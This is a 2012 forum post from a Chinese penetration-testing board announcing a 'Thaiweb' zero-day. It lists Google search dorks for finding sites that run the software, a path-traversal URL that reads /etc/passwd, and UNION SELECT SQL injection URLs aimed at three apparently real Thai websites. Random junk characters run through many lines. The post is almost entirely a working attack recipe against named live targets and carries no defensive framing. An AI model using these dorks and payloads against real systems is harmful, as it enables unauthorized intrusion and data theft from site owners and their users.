中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]
作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:1 c' w; C. C8 K' |5 K

1 n" p6 [3 s# B% Eintext:powered by Thaiweb
$ ^9 z' C# a8 m! V0 Y
' k: I# c! W6 z2 b% ^inurl:index.php?page=board.php
5 s. I3 \. a5 U- H8 k% U% T/ j5 ?0 D, q1 a1 V+ E% |

5 T1 a- ?2 c' k. n* f# S. r
: j8 L* d! [* U3 q& a" I利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
6 K6 E5 _% i% R/ ], Z
( d. l" E1 K3 i  L+ @; {% B8 m' E 9 Z1 ], I- h' L' n5 I. c

2 R+ H. G' G0 O% I$ u( \0 c利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
: q; u7 m8 p, l" S0 n& R9 B. h( k
5 W. g4 e* x1 `
4 w8 Z" z; U4 l9 Y4 N7 I9 L
  |6 [; p( S- M4 f8 y0 g# Uhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--* h# {: t2 O$ T
: j6 T" \! [1 x7 @0 ?
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--1 n! P: l& l0 j$ ^& C- y

& w4 K$ K9 e9 b, c: y6 J# N' lhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--; e$ x3 ?: ~/ x, W$ k# z




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2